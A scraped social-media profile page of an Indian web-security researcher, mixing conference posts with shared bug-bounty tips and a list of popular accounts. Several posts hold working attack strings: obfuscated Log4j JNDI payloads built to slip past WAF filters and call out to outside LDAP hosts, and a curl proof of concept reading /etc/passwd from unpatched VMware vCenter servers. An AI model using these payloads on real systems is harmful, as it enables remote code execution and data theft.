Olivia
Online
Darshit (DHacker)
@DVarotaria
|Security Analyst| |Researcher| |Expertised in Web Application Penetration Testing| |Independent security researcher|
India
Joined April 2013
677 Following
144 Followers
174 Posts
ย Pinned Tweet
It was hell lot of fun at @bsidesahmedabad, met some old friends, made some new ones.Thanks to @niksthehacker @dipenwadhwa and entire #BSidesAhmedabad2021 community for making this happen this year! Kudos! ๐๐ @emgeekboy thanks for motivating โ๐ผ
#carhacking #infosecurity
https://t.co/2CrETFfsEC
#bankingindustry
#blockchaintechnology #blockchainsecurity #blockchaininnovation
Iโll be at @nullcon from Sep 8 - 10 staying at Grand Hyatt Goa. Letโs meet if you are around during or after event. #NullconGoa2022
Just bypassed AWS WAF for log4j jndi injection:
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://mydogsbutt.com:1389/o}
Anyone who care to share Akamai Bypass?
#bugbountytips
Who to follow
@intigriti Log4j + User-Agent = ๐ฃ๐ฃ๐ฃ
If you're filtering on "ldap", "jndi", or the ${lower:x} method, I have bad news for you:
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
This gets past every filter I've found so far. There's no shortage of these bypasses.
#log4j
Companies not letting security researchers conduct full tests is like asking your doctor to only perform half of your annual physical. In @SCMagazine, Bugcrowd's @caseyjohnellis details why this is happening so often and what can result from limiting scope https://t.co/pz4LGJePk5
VMware vCenter unauthorized arbitrary file read
PoC working to Earlier versions (7.0.2.00100)
[PoC]
curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd"
https://t.co/Uah4ucgtAT
![wugeej's tweet photo. VMware vCenter unauthorized arbitrary file read
PoC working to Earlier versions (7.0.2.00100)
[PoC]
curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd"
https://t.co/Uah4ucgtAT https://t.co/58Pchmbi5n](https://pbs.twimg.com/media/FFqaRKWaUAAzxDe.jpg)
#KNOXSS really made me proud of, not just for what it made possible to achieve for several guys out there but also for what it has done for my big family (wife, kids, dogs & cats)!
Thank you all of you who ever had experienced my greatest work in those 5 years!
๐๐๐พ
It was great experience presenting Esoteric android vulnerabilities at @bsidesahmedabad with @realsanjay
#androidsecurity #infosec #cybersecurity
Blogged! I wrote about data exfiltration technique via CSS + SVG font
https://t.co/OQMgYUL0T0 (English)
https://t.co/FVMbdcJ067 (ๆฅๆฌ่ช)
https://t.co/5DDG1DM4jp (video)
Putting the final touches for "Do you speak my language" presentation @BlackHatEvents
You can read more about the presentation in
https://t.co/709XlQpoCZ
@stokfredrik Stokmaniac โ๐ผ๐
Last Seen Users on Sotwe
Most Popular Users
Elon Musk 
@elonmusk
240.2M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
109.1M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.3M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.6M followers
KATY PERRY
@katyperry
86.9M followers
Taylor Swift
@taylorswift13
80.7M followers
Lady Gaga
@ladygaga
72.2M followers
Kim Kardashian
@kimkardashian
69.4M followers
Virat Kohli
@imvkohli
68.6M followers
YouTube
@youtube
68.6M followers
Bill Gates
@billgates
63.5M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61.2M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
60M followers